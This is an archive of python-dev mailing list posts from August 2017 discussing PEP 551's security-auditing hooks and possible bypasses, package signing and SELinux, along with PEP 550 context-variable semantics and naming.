Message-ID: On Tue, Aug 29, 2017 at 12:23 PM, Steve Dower wrote: >> Check your line lengths, I think they may be too long? (Or maybe my mail >> client is set too short?) > > > Yeah, not sure what's happened here. Are PEPs supposed to be 80? Or 72? According to the emacs stanza at the end, 70. I don't know of any non-emacs editors that respect that, though. ChrisA From steve.dower at python.org Mon Aug 28 22:31:22 2017 From: steve.dower at python.org (Steve Dower) Date: Mon, 28 Aug 2017 19:31:22 -0700 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime In-Reply-To: References: <20170829011544.GE9671@ando.pearwood.info> Message-ID: <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org> On 28Aug2017 1834, Gregory P. Smith wrote: > My gut feeling says that there are N interpreters available on just > about every bloated system image out there. Multiple pythons are often > among them, other we do not control will also continue to exist. I > expect a small initial payload can be created that when executed will > binary patch the interpreter's memory to disable all auditing, > /potentially/ in a manner that cannot be audited itself (a challenge > guaranteed to be accepted). Repeating the three main goals listed by the PEP: * preventing malicious use is valuable * detecting malicious use is important * detecting attempts to bypass detection is critical This case falls under the last one. Yes, it is possible to patch the interpreter (at least in systems that don't block that - Windows certainly can prevent this at the kernel level), but in order to do so you should trigger at least one very unusual event (e.g. any of the ctypes ones). Compared to the current state, where someone can patch your interpreter without you ever being able to tell, it counts as a victory. And yeah, if you have alternative interpreters out there that are not auditing, you're in just as much trouble. There are certainly sysadmins who do a good job of controlling this though - these changes enable *those* sysadmins to do a better job, it doesn't help the ones who don't invest in it. > If the goal is to audit attacks and the above becomes the standard > attack payload boilerplate before existing "use python to pull down > 'fun' stuff to execute". It seems to negate the usefulness. You can audit all code before it executes and prevent it. Whether you use a local malware scanner or some sort of signature scan of log files doesn't matter, the change *enables* you to detect this behaviour. Right now it is impossible. > This audit layer seems like a defense against existing exploit kits > rather than future ones. As a *defense*, yes, though if you use a safelist of your own code rather than a blocklist of malicious code, you can defend against all unexpected code. (For example, you could have a signed catalog of code on the machine that is used to verify all sources that are executed. Again - these features are for sysadmins who invest in this, it isn't free security for lazy ones.) > Is that still useful from a defense in depth > point of view? Detection is very useful for defense in depth. The new direction of malware scanners is heading towards behavioural detection (away from signature-based detection) because it's more future proof to detect unexpected actions than unexpected code. (If you think any of these explanations deserve to be in the PEP text itself, please let me know so I can add it in. Or if you don't like them, let me know that too and I'll try again!) Cheers, Steve From steve.dower at python.org Mon Aug 28 22:45:58 2017 From: steve.dower at python.org (Steve Dower) Date: Mon, 28 Aug 2017 19:45:58 -0700 Subject: [Python-Dev] PEP 551: Security transparency in the Python runtime In-Reply-To: References: <20170829011544.GE9671@ando.pearwood.info> Message-ID: On 28Aug2017 1926, Chris Angelico wrote: > On Tue, Aug 29, 2017 at 12:23 PM, Steve Dower wrote: >>> Check your line lengths, I think they may be too long? (Or maybe my mail >>> client is set too short?) >> >> >> Yeah, not sure what's happened here. Are PEPs supposed to be 80? Or 72? > > According to the emacs stanza at the end, 70. I don't know of any > non-emacs editors that respect that, though. Ouch... it's hard enough to do a table in 80 characters. :( Guess my first editing task is rewrapping everything... Thanks (not really ;) ), Steve From v+python at g.nevcal.com Mon Aug 28 22:55:07 2017 From: v+python at g.nevcal.com (Glenn Linderman) Date: Mon, 28 Aug 2017 19:55:07 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On 8/28/2017 6:50 PM, Guido van Rossum wrote: > FWIW we *could* have a policy that OS threads also inherit the lookup > chain from their creator, but I doubt that's going to fly with > backwards compatibility. Since LC is new, how could such a policy affect backwards compatibility? The obvious answer would be that some use cases that presently use other mechanisms that "should" be ported to using LC would have to be careful in how they do the port, but discussion seems to indicate that they would have to be careful in how they do the port anyway. One of the most common examples is the decimal context. IIUC, each thread gets its initial decimal context from a global template, rather than inheriting from its parent thread. Porting decimal context to LC then, in the event of OS threads inheriting the lookup chain from their creator, would take extra work for compatibility: setting the decimal context from the global template (a step it must already take) rather than accepting the inheritance.? It might be appropriate that an updated version of decimal that uses LC would offer the option of inheriting the decimal context from the parent thread, or using the global template, as an enhancement. -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Mon Aug 28 23:45:03 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Mon, 28 Aug 2017 23:45:03 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: On Mon, Aug 28, 2017 at 9:50 PM, Guido van Rossum wrote: > On Mon, Aug 28, 2017 at 6:07 PM, Nathaniel Smith wrote: >> >> The important difference between generators/coroutines and normal >> function calls is that with normal function calls, the link between >> the caller and callee is fixed for the entire lifetime of the inner >> frame, so there's no way for the context to shift under your feet. If >> all we had were normal function calls, then (green-) thread locals >> using the save/restore trick would be enough to handle all the use >> cases above -- it's only for generators/coroutines where the >> save/restore trick breaks down. This means that pushing/popping LCs >> when crossing into/out of a generator frame is the minimum needed to >> get the desired semantics, and it keeps the LC stack small (important >> since lookups can be O(n) in the worst case), and it minimizes the >> backcompat breakage for operations like decimal.setcontext() where >> people *do* expect to call it in a subroutine and have the effects be >> visible in the caller. > > > I like this way of looking at things. Does this have any bearing on > asyncio.Task? To me those look more like threads than like generators. Or > possibly they should inherit the lookup chain from the point when the Task > was created, [..] We explain why tasks have to inherit the lookup chain from the point where they are created in the PEP (in the new High-level Specification section): https://www.python.org/dev/peps/pep-0550/#coroutines-and-asynchronous-tasks In short, without inheriting the chain we can't wrap coroutines into tasks (like wrapping an await in wait_for() would break the code, if we don't inherit the chain). In the latest version (v4) we made all coroutines to have their own Logical Context, which, as we discovered today, makes us unable to set context variables in __aenter__ coroutines. This will be fixed in the next version. > FWIW we *could* have a policy that OS threads also > inherit the lookup chain from their creator, but I doubt that's going to fly > with backwards compatibility. Backwards compatibility is indeed an issue. Inheriting the chain for threads would mean another difference between PEP 550 and 'threading.local()', that could cause backwards incompatible behaviour for decimal/numpy when they are updated to new APIs. For decimal, for example, we could use the following pattern to fallback to use the default decimal context for ECs (threads) that don't have it set: ctx = decimal_var.get(default=default_decimal_ctx) We can also add an 'initializer' keyword-argument to 'new_context_var' to specify a callable that will be used to give a default value to the var. Another issue, is that with the current C API, we can only inherit EC for threads started with 'threading.Thread'. There's no reliable way to inherit the chain if a thread was initialized by a C extension. IMO, inheriting the lookup chain in threads makes sense when we use them for pools, like concurrent.futures.ThreadPoolExecutor. When threads are used as long-running subprograms, inheriting the chain should be an opt-in. Yury From ncoghlan at gmail.com Tue Aug 29 05:01:03 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 29 Aug 2017 19:01:03 +1000 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: On 27 August 2017 at 03:23, Yury Selivanov wrote: > On Sat, Aug 26, 2017 at 1:23 PM, Ethan Furman wrote: >> On 08/26/2017 09:25 AM, Yury Selivanov wrote: >>> ContextVar.lookup() method *traverses the stack* until it finds the LC >>> that has a value. "get()" does not reflect this subtle semantics >>> difference. >> >> A good point; however, ChainMap, which behaves similarly as far as lookup >> goes, uses "get" and does not have a "lookup" method. I think we lose more >> than we gain by changing that method name. > > ChainMap is constrained to be a Mapping-like object, but I get your > point. Let's see what others say about the "lookup()". It is kind of > an experiment to try a name and see if it fits. I don't think "we may want to add extra parameters" is a good reason to omit a conventional `get()` method - I think it's a reason to offer a separate API to handle use cases where the question of *where* the var is set matters (for example, `my_var.is_set()` would indicate whether or not `my_var.set()` has been called in the current logical context without requiring a parameter check for normal lookups that don't care). Cheers, Nick. P.S. And I say that as a reader who correctly guessed why you had changed the method name in the current iteration of the proposal. I'm sympathetic to those reasons, but I think sticking with the conventional API will make this one easier to learn and use :) -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Tue Aug 29 06:53:15 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 29 Aug 2017 20:53:15 +1000 Subject: [Python-Dev] Pep 550 module In-Reply-To: References: Message-ID: On 28 August 2017 at 01:51, Jim J. Jewett wrote: > I think there is general consensus that this should go in a module other > than sys. (At least a submodule.) > > The specific names are still To Be Determined, but I suspect seeing the > functions and objects as part of a named module will affect what works. Given the refocusing of the PEP on the context variable API, with the other aspects introduced solely in service of making context variables work as defined, my current suggestion would be to make it a hybrid Python/C API using the "contextvars" + "_contextvars" naming convention. Then all most end user applications defining context variables would need is the single line: from contextvars import new_context_var _contextvars would contain the APIs that only the interpreter itself can implement, while contextvars would provide a home for any pure Python convenience APIs that could be shared across interpreter implementations. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From ncoghlan at gmail.com Tue Aug 29 08:21:56 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Tue, 29 Aug 2017 22:21:56 +1000 Subject: [Python-Dev] PEP 550 v4: coroutine policy In-Reply-To: References: Message-ID: On 29 August 2017 at 07:24, Yury Selivanov wrote: > This means that PEP 550 will have a caveat for async code: don't rely > on context propagation up the call stack, unless you are writing > __aenter__ and __aexit__ that are guaranteed to be called without > being wrapped into a Task. I'm not sure if it was Nathaniel or Stefan that raised it, but I liked the analogy that compared wrapping a coroutine in a new Task to submitting a synchronous function call to a concurrent.futures executor: while the dispatch layer is able to pass down a snapshot of the current execution context to the submitted function or wrapped coroutine, the potential for concurrent execution of multiple activities using that same context means the dispatcher *can't* reliably pass back any changes that the child context makes. For example, consider the following: def func(): with make_executor() as executor: fut1 = executor.submit(other_func1) fut2 = executor.submit(other_func2) result1 = fut1.result() result2 = fut2.result() async def coro(): fut1 = asyncio.ensure_future(other_coro1()) fut2 = asyncio.ensure_future(other_coro2()) result1 = await fut1 result2 = await fut2 For both of these cases, it shouldn't matter which order we use to wait for the results, or if we perform any other operations in between, and the only way to be sure of that outcome is if the dispatch operations (whether that's asyncio.ensure_future or executor.submit) prevent reverse propagation of context changes from the operation being dispatched. Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From wes.turner at gmail.com Tue Aug 29 09:14:34 2017 From: wes.turner at gmail.com (Wes Turner) Date: Tue, 29 Aug 2017 08:14:34 -0500 Subject: [Python-Dev] [Security-sig] PEP 551: Security transparency in the Python runtime In-Reply-To: <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org> References: <20170829011544.GE9671@ando.pearwood.info> <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org> Message-ID: On Monday, August 28, 2017, Steve Dower wrote: > On 28Aug2017 1834, Gregory P. Smith wrote: > >> My gut feeling says that there are N interpreters available on just >> about every bloated system image out there. Multiple pythons are often >> among them, other we do not control will also continue to exist. I >> expect a small initial payload can be created that when executed will >> binary patch the interpreter's memory to disable all auditing, >> /potentially/ in a manner that cannot be audited itself (a challenge >> guaranteed to be accepted). >> > > Repeating the three main goals listed by the PEP: > * preventing malicious use is valuable > * detecting malicious use is important > * detecting attempts to bypass detection is critical > > This case falls under the last one. Yes, it is possible to patch the > interpreter (at least in systems that don't block that - Windows certainly > can prevent this at the kernel level), but in order to do so you should > trigger at least one very unusual event (e.g. any of the ctypes ones). > > Compared to the current state, where someone can patch your interpreter > without you ever being able to tell, it counts as a victory. > > And yeah, if you have alternative interpreters out there that are not > auditing, you're in just as much trouble. There are certainly sysadmins who > do a good job of controlling this though - these changes enable *those* > sysadmins to do a better job, it doesn't help the ones who don't invest in > it. > > If the goal is to audit attacks and the above becomes the standard >> attack payload boilerplate before existing "use python to pull down >> 'fun' stuff to execute". It seems to negate the usefulness. >> > > You can audit all code before it executes and prevent it. Whether you use > a local malware scanner or some sort of signature scan of log files doesn't > matter, the change *enables* you to detect this behaviour. Right now it is > impossible. Wouldn't it be great to have the resources to source audit all code? (And expect everyone to GPG sign all their commits someday.) Many Linux packaging formats do have checksums of all files in a package: {RPM, DEB,} Python Wheel packages do have a manifest with SHA256 file checksums. bdist_wheel.write_record(): https://bitbucket.org/pypa/wheel/src/5d49f8cf18679d1bc6f3e1e414a5df3a1e492644/wheel/bdist_wheel.py?at=default&fileviewer=file-view-default#bdist_wheel.py-436 Is there a tool for checking these manifest and file checksums and signatures? Which keys can sign for which packages? IIUC, any key loaded into the local keyring is currently valid for any package? "ENH: GPG signatures, branch-environment map (GitFS/HgFS workflow)" https://github.com/saltstack/salt/issues/12183 - links to GPG signing support in hg, git, os packaging systems ... Setting and checking SELinux file context labels: Someone else can explain how DEB handles semanage and chcon? https://fedoraproject.org/wiki/PackagingDrafts/SELinux RPM supports .te (type enforcement), .fc (file context), and .if SELinux files with an `semodule` command. RPM requires various combinations of the policycoreutils, selinux-policy-targeted, selinux-policy-devel, and policycoreutils-python packages. Should setup.py (running with set fcontext (eg root)) just call chcon itself; or is it much better to repack (signed) Python packages as e.g. RPMs? FWIW, Salt and Ansible do support setting and checking SELinux file contexts: salt.modules.selinux: https://docs.saltstack.com/en/latest/ref/modules/all/salt.modules.selinux.html https://github.com/saltstack/salt/blob/develop/salt/modules/selinux.py Requires: - cmds: semanage, setsebool, semodule - pkgs: policycoreutils, policycoreutils-python, Ansible sefcontext: http://docs.ansible.com/ansible/latest/sefcontext_module.html https://github.com/ansible/ansible/blob/devel/lib/ansible/modules/system/sefcontext.py Requires: - pkgs: libselinux-python, policycoreutils-python Does it make sense to require e.g. policycoreutils-python[-python] in 'spython'? ((1) Instead of wrapping `ls -Z` and `chcon` (2) in setup.py (3) as root)? > This audit layer seems like a defense against existing exploit kits >> rather than future ones. >> > > As a *defense*, yes, though if you use a safelist of your own code rather > than a blocklist of malicious code, you can defend against all unexpected > code. (For example, you could have a signed catalog of code on the machine > that is used to verify all sources that are executed. Again - these > features are for sysadmins who invest in this, it isn't free security for > lazy ones.) > > Is that still useful from a defense in depth >> point of view? >> > > Detection is very useful for defense in depth. The new direction of > malware scanners is heading towards behavioural detection (away from > signature-based detection) because it's more future proof to detect > unexpected actions than unexpected code. > > (If you think any of these explanations deserve to be in the PEP text > itself, please let me know so I can add it in. Or if you don't like them, > let me know that too and I'll try again!) > > Cheers, > Steve > > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/wes. > turner%40gmail.com > -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Tue Aug 29 09:14:53 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 09:14:53 -0400 Subject: [Python-Dev] Pep 550 module In-Reply-To: References: Message-ID: On Tue, Aug 29, 2017 at 6:53 AM, Nick Coghlan wrote: > On 28 August 2017 at 01:51, Jim J. Jewett wrote: >> I think there is general consensus that this should go in a module other >> than sys. (At least a submodule.) >> >> The specific names are still To Be Determined, but I suspect seeing the >> functions and objects as part of a named module will affect what works. > > Given the refocusing of the PEP on the context variable API, with the > other aspects introduced solely in service of making context variables > work as defined, my current suggestion would be to make it a hybrid > Python/C API using the "contextvars" + "_contextvars" naming > convention. > > Then all most end user applications defining context variables would > need is the single line: > > from contextvars import new_context_var I like it! +1 from me. Yury From yselivanov.ml at gmail.com Tue Aug 29 09:18:21 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 09:18:21 -0400 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: On Tue, Aug 29, 2017 at 5:01 AM, Nick Coghlan wrote: [..] > P.S. And I say that as a reader who correctly guessed why you had > changed the method name in the current iteration of the proposal. I'm > sympathetic to those reasons, but I think sticking with the > conventional API will make this one easier to learn and use :) Yeah, I agree. We'll switch lookup -> get in the next iteration. Guido's parallel with getattr/setattr/delattr is also useful. getattr can also lookup the attribute in base classes, but we still call it "get". Yury From elprans at gmail.com Tue Aug 29 09:46:20 2017 From: elprans at gmail.com (Elvis Pranskevichus) Date: Tue, 29 Aug 2017 09:46:20 -0400 Subject: [Python-Dev] Pep 550 module In-Reply-To: References: Message-ID: <2857548.zQZTC0OYsW@hammer.magicstack.net> On Tuesday, August 29, 2017 9:14:53 AM EDT Yury Selivanov wrote: > On Tue, Aug 29, 2017 at 6:53 AM, Nick Coghlan wrote: > > On 28 August 2017 at 01:51, Jim J. Jewett wrote: > >> I think there is general consensus that this should go in a module > >> other than sys. (At least a submodule.) > >> > >> The specific names are still To Be Determined, but I suspect seeing > >> the functions and objects as part of a named module will affect > >> what works.> > > Given the refocusing of the PEP on the context variable API, with > > the > > other aspects introduced solely in service of making context > > variables work as defined, my current suggestion would be to make > > it a hybrid Python/C API using the "contextvars" + "_contextvars" > > naming convention. > > > > Then all most end user applications defining context variables would > > > > need is the single line: > > from contextvars import new_context_var > > I like it! > > +1 from me. +1 From ncoghlan at gmail.com Tue Aug 29 10:22:35 2017 From: ncoghlan at gmail.com (Nick Coghlan) Date: Wed, 30 Aug 2017 00:22:35 +1000 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: <59A0DAB4.2030807@stoneleaf.us> <59A1AE78.6090609@stoneleaf.us> Message-ID: On 29 August 2017 at 23:18, Yury Selivanov wrote: > On Tue, Aug 29, 2017 at 5:01 AM, Nick Coghlan wrote: > [..] >> P.S. And I say that as a reader who correctly guessed why you had >> changed the method name in the current iteration of the proposal. I'm >> sympathetic to those reasons, but I think sticking with the >> conventional API will make this one easier to learn and use :) > > Yeah, I agree. We'll switch lookup -> get in the next iteration. > > Guido's parallel with getattr/setattr/delattr is also useful. getattr > can also lookup the attribute in base classes, but we still call it > "get". True, in many ways attribute inheritance is Python's original ChainMap implementation :) Cheers, Nick. -- Nick Coghlan | ncoghlan at gmail.com | Brisbane, Australia From guido at python.org Tue Aug 29 10:47:16 2017 From: guido at python.org (Guido van Rossum) Date: Tue, 29 Aug 2017 07:47:16 -0700 Subject: [Python-Dev] Pep 550 module In-Reply-To: <2857548.zQZTC0OYsW@hammer.magicstack.net> References: <2857548.zQZTC0OYsW@hammer.magicstack.net> Message-ID: On Tue, Aug 29, 2017 at 6:46 AM, Elvis Pranskevichus wrote: > On Tuesday, August 29, 2017 9:14:53 AM EDT Yury Selivanov wrote: > > On Tue, Aug 29, 2017 at 6:53 AM, Nick Coghlan > wrote: > > > Given the refocusing of the PEP on the context variable API, with > > > the > > > other aspects introduced solely in service of making context > > > variables work as defined, my current suggestion would be to make > > > it a hybrid Python/C API using the "contextvars" + "_contextvars" > > > naming convention. > > > > > > Then all most end user applications defining context variables would > > > > > > need is the single line: > > > from contextvars import new_context_var > > > > I like it! > > > > +1 from me. > > +1 > OK, but does it have to look like a factory function? Can't it look like a class? E.g. from contextvars import ContextVar my_parameter = ContextVar() async def some_calculation(): my_parameter.set(my_parameter.get() + 2) my_parameter.delete() -- --Guido van Rossum (python.org/~guido ) -------------- next part -------------- An HTML attachment was scrubbed... URL: From steve.dower at python.org Tue Aug 29 11:01:37 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 29 Aug 2017 08:01:37 -0700 Subject: [Python-Dev] [Security-sig] PEP 551: Security transparency in the Python runtime In-Reply-To: References: <20170829011544.GE9671@ando.pearwood.info> <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org> Message-ID: <0e2d5c52-b19f-0451-bcb0-c29189995680@python.org> On 29Aug2017 0614, Wes Turner wrote: > Wouldn't it be great to have the resources to source audit all code? > (And expect everyone to GPG sign all their commits someday.) If you care this much, then you will find the resources to audit all the code manually after you've downloaded it and before you've deployed it (or delegate that trust/liability elsewhere). Plenty of larger companies do it, especially for their high value targets. The rest of your email is highly platform-specific, and so while they are potential *uses* of this PEP, and I hope people will take the time to investigate them, they don't contribute to it in any way. None of these things will be added to or required by the core CPython release. Cheers, Steve > Many Linux packaging formats do have checksums of all files in a > package: {RPM, DEB,} > > Python Wheel packages do have a manifest with SHA256 file checksums. > bdist_wheel.write_record(): > > https://bitbucket.org/pypa/wheel/src/5d49f8cf18679d1bc6f3e1e414a5df3a1e492644/wheel/bdist_wheel.py?at=default&fileviewer=file-view-default#bdist_wheel.py-436 > > Is there a tool for checking these manifest and file checksums and > signatures? > > Which keys can sign for which packages? IIUC, any key loaded into the > local keyring is currently valid for any package? > > "ENH: GPG signatures, branch-environment map (GitFS/HgFS workflow)" > https://github.com/saltstack/salt/issues/12183 > > - links to GPG signing support in hg, git, os packaging systems > > ... > > Setting and checking SELinux file context labels: > > Someone else can explain how DEB handles semanage and chcon? > > https://fedoraproject.org/wiki/PackagingDrafts/SELinux > > RPM supports .te (type enforcement), .fc (file context), and .if SELinux > files with an `semodule` command. > > RPM requires various combinations of the policycoreutils, > selinux-policy-targeted, selinux-policy-devel, and > ?policycoreutils-python packages. > > Should setup.py (running with set fcontext (eg root)) just call chcon > itself; or is it much better to repack (signed) Python packages as e.g. > RPMs? > > FWIW, Salt and Ansible do support setting and checking SELinux file > contexts: > salt.modules.selinux: > > https://docs.saltstack.com/en/latest/ref/modules/all/salt.modules.selinux.html > > https://github.com/saltstack/salt/blob/develop/salt/modules/selinux.py > > Requires: > - cmds: semanage, setsebool, semodule > - pkgs: policycoreutils, policycoreutils-python, > > > Ansible sefcontext: > > http://docs.ansible.com/ansible/latest/sefcontext_module.html > > https://github.com/ansible/ansible/blob/devel/lib/ansible/modules/system/sefcontext.py > > Requires: > - pkgs: libselinux-python, policycoreutils-python > > Does it make sense to require e.g. policycoreutils-python[-python] in > 'spython'? ((1) Instead of wrapping `ls -Z` and `chcon` (2) in setup.py > (3) as root)? From steve.dower at python.org Tue Aug 29 11:12:09 2017 From: steve.dower at python.org (Steve Dower) Date: Tue, 29 Aug 2017 08:12:09 -0700 Subject: [Python-Dev] [Security-sig] PEP 551: Security transparency in the Python runtime In-Reply-To: <0e2d5c52-b19f-0451-bcb0-c29189995680@python.org> References: <20170829011544.GE9671@ando.pearwood.info> <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org> <0e2d5c52-b19f-0451-bcb0-c29189995680@python.org> Message-ID: <8cefff0d-1471-749f-a36e-af3058dad97c@python.org> On 29Aug2017 0801, Steve Dower wrote: > On 29Aug2017 0614, Wes Turner wrote: >> Wouldn't it be great to have the resources to source audit all code? >> (And expect everyone to GPG sign all their commits someday.) > > If you care this much, then you will find the resources to audit all the > code manually after you've downloaded it and before you've deployed it > (or delegate that trust/liability elsewhere). Plenty of larger companies > do it, especially for their high value targets. On re-reading it wasn't entirely clear, so just to clarify: * above, "you" is meant as a generally inclusive term (i.e., not just Wes, unless Wes is also a sysadmin who is trying to carefully control his network :) ) * below, "you" is specifically the author of the email (i.e., Wes) Cheers, Steve > The rest of your email is highly platform-specific, and so while they > are potential *uses* of this PEP, and I hope people will take the time > to investigate them, they don't contribute to it in any way. None of > these things will be added to or required by the core CPython release. > > Cheers, > Steve > >> Many Linux packaging formats do have checksums of all files in a >> package: {RPM, DEB,} >> >> Python Wheel packages do have a manifest with SHA256 file checksums. >> bdist_wheel.write_record(): >> >> https://bitbucket.org/pypa/wheel/src/5d49f8cf18679d1bc6f3e1e414a5df3a1e492644/wheel/bdist_wheel.py?at=default&fileviewer=file-view-default#bdist_wheel.py-436 >> >> >> Is there a tool for checking these manifest and file checksums and >> signatures? >> >> Which keys can sign for which packages? IIUC, any key loaded into the >> local keyring is currently valid for any package? >> >> "ENH: GPG signatures, branch-environment map (GitFS/HgFS workflow)" >> https://github.com/saltstack/salt/issues/12183 >> >> - links to GPG signing support in hg, git, os packaging systems >> >> ... >> >> Setting and checking SELinux file context labels: >> >> Someone else can explain how DEB handles semanage and chcon? >> >> https://fedoraproject.org/wiki/PackagingDrafts/SELinux >> >> RPM supports .te (type enforcement), .fc (file context), and .if >> SELinux files with an `semodule` command. >> >> RPM requires various combinations of the policycoreutils, >> selinux-policy-targeted, selinux-policy-devel, and >> ??policycoreutils-python packages. >> >> Should setup.py (running with set fcontext (eg root)) just call chcon >> itself; or is it much better to repack (signed) Python packages as >> e.g. RPMs? >> >> FWIW, Salt and Ansible do support setting and checking SELinux file >> contexts: >> salt.modules.selinux: >> >> https://docs.saltstack.com/en/latest/ref/modules/all/salt.modules.selinux.html >> >> >> https://github.com/saltstack/salt/blob/develop/salt/modules/selinux.py >> >> Requires: >> - cmds: semanage, setsebool, semodule >> - pkgs: policycoreutils, policycoreutils-python, >> >> >> Ansible sefcontext: >> >> http://docs.ansible.com/ansible/latest/sefcontext_module.html >> >> https://github.com/ansible/ansible/blob/devel/lib/ansible/modules/system/sefcontext.py >> >> >> Requires: >> - pkgs: libselinux-python, policycoreutils-python >> >> Does it make sense to require e.g. policycoreutils-python[-python] in >> 'spython'? ((1) Instead of wrapping `ls -Z` and `chcon` (2) in >> setup.py (3) as root)? > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: > https://mail.python.org/mailman/options/python-dev/steve.dower%40python.org From wes.turner at gmail.com Tue Aug 29 12:04:19 2017 From: wes.turner at gmail.com (Wes Turner) Date: Tue, 29 Aug 2017 11:04:19 -0500 Subject: [Python-Dev] [Security-sig] PEP 551: Security transparency in the Python runtime In-Reply-To: <8cefff0d-1471-749f-a36e-af3058dad97c@python.org> References: <20170829011544.GE9671@ando.pearwood.info> <44befa5d-df9a-6c12-0bd4-baeb26888bff@python.org> <0e2d5c52-b19f-0451-bcb0-c29189995680@python.org> <8cefff0d-1471-749f-a36e-af3058dad97c@python.org> Message-ID: On Tuesday, August 29, 2017, Steve Dower wrote: > On 29Aug2017 0801, Steve Dower wrote: > >> On 29Aug2017 0614, Wes Turner wrote: >> >>> Wouldn't it be great to have the resources to source audit all code? >>> (And expect everyone to GPG sign all their commits someday.) >>> >> >> If you care this much, then you will find the resources to audit all the >> code manually after you've downloaded it and before you've deployed it (or >> delegate that trust/liability elsewhere). Plenty of larger companies do it, >> especially for their high value targets. >> > > On re-reading it wasn't entirely clear, so just to clarify: > > * above, "you" is meant as a generally inclusive term (i.e., not just Wes, > unless Wes is also a sysadmin who is trying to carefully control his > network :) ) > > * below, "you" is specifically the author of the email (i.e., Wes) avc: denied <[{/end> Thanks! > > Cheers, > Steve > > The rest of your email is highly platform-specific, and so while they are >> potential *uses* of this PEP, and I hope people will take the time to >> investigate them, they don't contribute to it in any way. None of these >> things will be added to or required by the core CPython release. >> >> Cheers, >> Steve >> >> Many Linux packaging formats do have checksums of all files in a package: >>> {RPM, DEB,} >>> >>> Python Wheel packages do have a manifest with SHA256 file checksums. >>> bdist_wheel.write_record(): >>> >>> https://bitbucket.org/pypa/wheel/src/5d49f8cf18679d1bc6f3e1e >>> 414a5df3a1e492644/wheel/bdist_wheel.py?at=default& >>> fileviewer=file-view-default#bdist_wheel.py-436 >>> >>> Is there a tool for checking these manifest and file checksums and >>> signatures? >>> >>> Which keys can sign for which packages? IIUC, any key loaded into the >>> local keyring is currently valid for any package? >>> >>> "ENH: GPG signatures, branch-environment map (GitFS/HgFS workflow)" >>> https://github.com/saltstack/salt/issues/12183 >>> >>> - links to GPG signing support in hg, git, os packaging systems >>> >>> ... >>> >>> Setting and checking SELinux file context labels: >>> >>> Someone else can explain how DEB handles semanage and chcon? >>> >>> https://fedoraproject.org/wiki/PackagingDrafts/SELinux >>> >>> RPM supports .te (type enforcement), .fc (file context), and .if SELinux >>> files with an `semodule` command. >>> >>> RPM requires various combinations of the policycoreutils, >>> selinux-policy-targeted, selinux-policy-devel, and policycoreutils-python >>> packages. >>> >>> Should setup.py (running with set fcontext (eg root)) just call chcon >>> itself; or is it much better to repack (signed) Python packages as e.g. >>> RPMs? >>> >>> FWIW, Salt and Ansible do support setting and checking SELinux file >>> contexts: >>> salt.modules.selinux: >>> >>> https://docs.saltstack.com/en/latest/ref/modules/all/salt.mo >>> dules.selinux.html >>> >>> https://github.com/saltstack/salt/blob/develop/salt/modules/selinux.py >>> >>> Requires: >>> - cmds: semanage, setsebool, semodule >>> - pkgs: policycoreutils, policycoreutils-python, >>> >>> >>> Ansible sefcontext: >>> >>> http://docs.ansible.com/ansible/latest/sefcontext_module.html >>> >>> https://github.com/ansible/ansible/blob/devel/lib/ansible/ >>> modules/system/sefcontext.py >>> >>> Requires: >>> - pkgs: libselinux-python, policycoreutils-python >>> >>> Does it make sense to require e.g. policycoreutils-python[-python] in >>> 'spython'? ((1) Instead of wrapping `ls -Z` and `chcon` (2) in setup.py (3) >>> as root)? >>> >> _______________________________________________ >> Python-Dev mailing list >> Python-Dev at python.org >> https://mail.python.org/mailman/listinfo/python-dev >> Unsubscribe: https://mail.python.org/mailman/options/python-dev/steve. >> dower%40python.org >> > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From yselivanov.ml at gmail.com Tue Aug 29 13:16:50 2017 From: yselivanov.ml at gmail.com (Yury Selivanov) Date: Tue, 29 Aug 2017 13:16:50 -0400 Subject: [Python-Dev] Pep 550 module In-Reply-To: References: <2857548.zQZTC0OYsW@hammer.magicstack.net> Message-ID: On Tue, Aug 29, 2017 at 10:47 AM, Guido van Rossum wrote: > On Tue, Aug 29, 2017 at 6:46 AM, Elvis Pranskevichus > wrote: >> >> On Tuesday, August 29, 2017 9:14:53 AM EDT Yury Selivanov wrote: >> > On Tue, Aug 29, 2017 at 6:53 AM, Nick Coghlan >> wrote: >> > > Given the refocusing of the PEP on the context variable API, with >> > > the >> > > other aspects introduced solely in service of making context >> > > variables work as defined, my current suggestion would be to make >> > > it a hybrid Python/C API using the "contextvars" + "_contextvars" >> > > naming convention. >> > > >> > > Then all most end user applications defining context variables would >> > > >> > > need is the single line: >> > > from contextvars import new_context_var >> > >> > I like it! >> > >> > +1 from me. >> >> +1 > > > OK, but does it have to look like a factory function? Can't it look like a > class? E.g. > > from contextvars import ContextVar > > my_parameter = ContextVar() > 